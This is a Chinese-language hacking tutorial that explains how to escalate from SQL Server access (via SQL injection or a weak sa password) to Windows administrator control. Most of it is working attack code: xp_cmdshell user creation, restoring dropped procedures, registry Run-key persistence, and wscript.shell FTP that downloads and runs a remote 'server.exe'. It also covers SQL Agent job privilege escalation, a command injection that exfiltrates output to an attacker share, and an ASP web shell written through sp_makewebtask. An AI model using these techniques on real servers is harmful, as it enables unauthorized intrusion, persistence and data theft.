假设一台主机开了1433端口我们已通过SQL注入或是空弱密码远程连接
能有哪些办法加一个
系统管理员用户呢(或是执行系统命令)
1).XP_CMDSHELL <|>cmd.exe /c net user aaa bbb /add<|>
人人都知道的办法,最大的好处是有回显,但是最怕
if exists (select * from
dbo.sysobjects where id = object_id(N<|>[dbo].[xp_cmdshell]<|>) and
OBJECTPROPERTY(id, N<|>IsExtendedProc<|>) = 1)
exec sp_dropextendedproc N<|>[dbo].[xp_cmdshell]<|>
GO
通过上面的T-SQL语句就可以把这个扩展储存删了
我们一般可以用
2k:
EXEC sp_addextendedproc xp_cmdshell ,@dllname =<|>xplog70.dll<|>
SQL97:
EXEC sp_addextendedproc xp_cmdshell ,@dllname =<|>xpsql70.dll<|>
就还原了.
但是有的人知道sp_addextendedproc也只不过是一个储存过程一样可以删除的
DROP PROCEDURE sp_addextendedproc
if exists (select * from
dbo.sysobjects where id = object_id(N<|>[dbo].[xp_cmdshell]<|>) and
OBJECTPROPERTY(id, N<|>IsExtendedProc<|>) = 1)
exec sp_dropextendedproc N<|>[dbo].[xp_cmdshell]<|>
GO
还原:
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,<|>sp_addextendedproc<|>)
return (1)
end
/*
** Create the extended procedure mapping.
*/
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
唉呀呀写了这么多其实有个最简单的保护办法:
先NET stop mssqlserver,然后把xplog70.dll(SQL97下用xpsql70.dll)删了
再把服务打开就可以了
2)
看了上面的你就明白了xp_cmdshell最终是可以被删除的,没别的办法了吗?
有写注册表三:
xp_regwrite <|>HKEY_LOCAL_MACHINE<|>,<|>SOFTWARE\Microsoft\Windows\currentversion\run<|>, <|>czy82<|>,<|>REG_SZ<|>, net user czy bb /add
其实注册表还有好几个地方可以写的比如说注册表中的WEB浏览设置
用写注册表的办法不好的地方是不但没有回显而且不能马上运行,实不
实用我也不知道了:(
3)
declare @s int
exec sp_oacreate "wscript.shell",@s out
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo open asp.7i24.com>c:\a.txt"
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo 123321>>c:\a.txt"
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo 123321>>c:\a.txt"
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo get server.exe>>c:\a.txt"
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo close>>c:\a.txt"
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c ftp -s:c:\a.txt"
exec sp_oamethod @s,"run",NULL,"cmd.exe /c server"
对了正如你看到的我们还可以使用sp_oacreate和sp_oamethod,在它们的作用下我们可以
调用系统的控件比如说fso,wsh,shell什么的,但是有个问题是并不能象xp_cmdshell那样
马上看到结果,真的不能吗看下面的:
declare @s int,@o int ,@f int,@str nvarchar(4000)
/*exec sp_oacreate "wscript.shell",@s out
exec sp_oamethod @s,"run",NULL,"cmd.exe /c net user>c:\temp.txt"*/
exec sp_oacreate "scripting.filesystemobject", @o out
exec sp_oamethod @o, "opentextfile", @f out,"c:\temp.txt", 1
exec sp_oamethod @f, "readall",@str out
print @str
先执行注解内的然后执行外面的其实原理很简单就是利用>把结果写到一个文件中然后用
fso来读出来!很实用的:)
------------------------------------------
写到这儿该作个总结了上面三个办法可能大家都知道吧
下面的可能知道的人就少了:)
------------------------------------------
4)
use msdb; --这儿不要是master哟
exec sp_add_job @job_name=<|>czy82<|>;
exec sp_add_jobstep @job_name=<|>czy82<|>,@step_name = <|>Exec my sql<|>,@subsystem=<|>CMDEXEC<|>,@command=<|>dir c:\>c:\b.txt<|>;
exec sp_add_jobserver @job_name = <|>czy82<|>,@server_name = <|>smscomputer<|>;
exec sp_start_job @job_name=<|>czy82<|>;
利用MSSQL的
作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以
执行tsql语句了.
对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名
第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)
net start SQLSERVERAGENT
对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的
USE msdb
EXEC sp_add_job @job_name = <|>GetSystemOnSQL<|>,
@enabled = 1,
@description = <|>This will give a low privileged user access to
xp_cmdshell<|>,
@delete_level = 1
EXEC sp_add_jobstep @job_name = <|>GetSystemOnSQL<|>,
@step_name = <|>Exec my sql<|>,
@subsystem = <|>TSQL<|>,
@command = <|>exec master..xp_execresultset N<|><|>select <|><|><|><|>exec
master..xp_cmdshell "dir > c:\agent-job-results.txt"<|><|><|><|><|><|>,N<|><|>Master<|><|><|>
EXEC sp_add_jobserver @job_name = <|>GetSystemOnSQL<|>,
@server_name = <|>你的SQL的服务器名<|>
EXEC sp_start_job @job_name = <|>GetSystemOnSQL<|>
不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以
才让我们可以以public执行xp_cmdshell
5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)
在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968
USE msdb
EXEC sp_add_job @job_name = <|>Arbit
raryFileCreate<|>,
@enabled = 1,
@description = <|>This will create a file called c:\sqlafc123.txt<|>,
@delete_level = 1
EXEC sp_add_jobstep @job_name = <|>ArbitraryFileCreate<|>,
@step_name = <|>SQLAFC<|>,
@subsystem = <|>TSQL<|>,
@command = <|>select <|><|>hello, this file was created by the SQL Agent.<|><|><|>,
@output_file_name = <|>c:\sqlafc123.txt<|>
EXEC sp_add_jobserver @job_name = <|>ArbitraryFileCreate<|>,
@server_name = <|>SERVER_NAME<|>
EXEC sp_start_job @job_name = <|>ArbitraryFileCreate<|>
如果subsystem选的是:tsql,在生成的文件的头部有如下内容
??揂rbitraryFileCreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19
----------------------------------------------
hello, this file was created by the SQL Agent.
(1 ?????)
所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员
命令的vbs文件到启动目录!
6)关于sp_makewebtask(可以写任意内容任意文件名的文件)
关于sp_MScopyscriptfile 看下面的例子
declare @command varchar(100)
declare @scripfile varchar(200)
set concat_null_yields_null off
select @command=<|>dir c:\ > "\\attackerip\share\dir.txt"<|>
select @scripfile=<|>c:\autoexec.bat > nul" | <|> + @command + <|> | rd "<|>
exec sp_MScopyscriptfile @scripfile ,<|><|>
这两个东东都还在测试试哟
让MSSQL的public用户得到一个本机的web shell:)
sp_makewebtask @outputfile=<|>d:\sms\a.asp<|>,@charset=gb2312,
--@query=<|>select <|><|>
<|><|><|>
--@query=<|>select <|><|><%response.write request.servervariables("APPL_PHYSICAL_PATH")%><|><|> <|>
@query=<|>select <|><|>
<%On Error Resume Next
Set oscript = Server.CreateObject("wscript.SHELL")
Set oscriptNet = Server.CreateObject("wscript.NETWORK")
Set oFileSys = Server.CreateObject("scripting.FileSystemObject")
szCMD = Request.Form(".CMD")
If (szCMD <>"")Then
szTempFile = "C:\" & oFileSys.GetTempName()
Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0)
End If %>
<% If (IsObject(oFile))Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If%>
<|><|><|>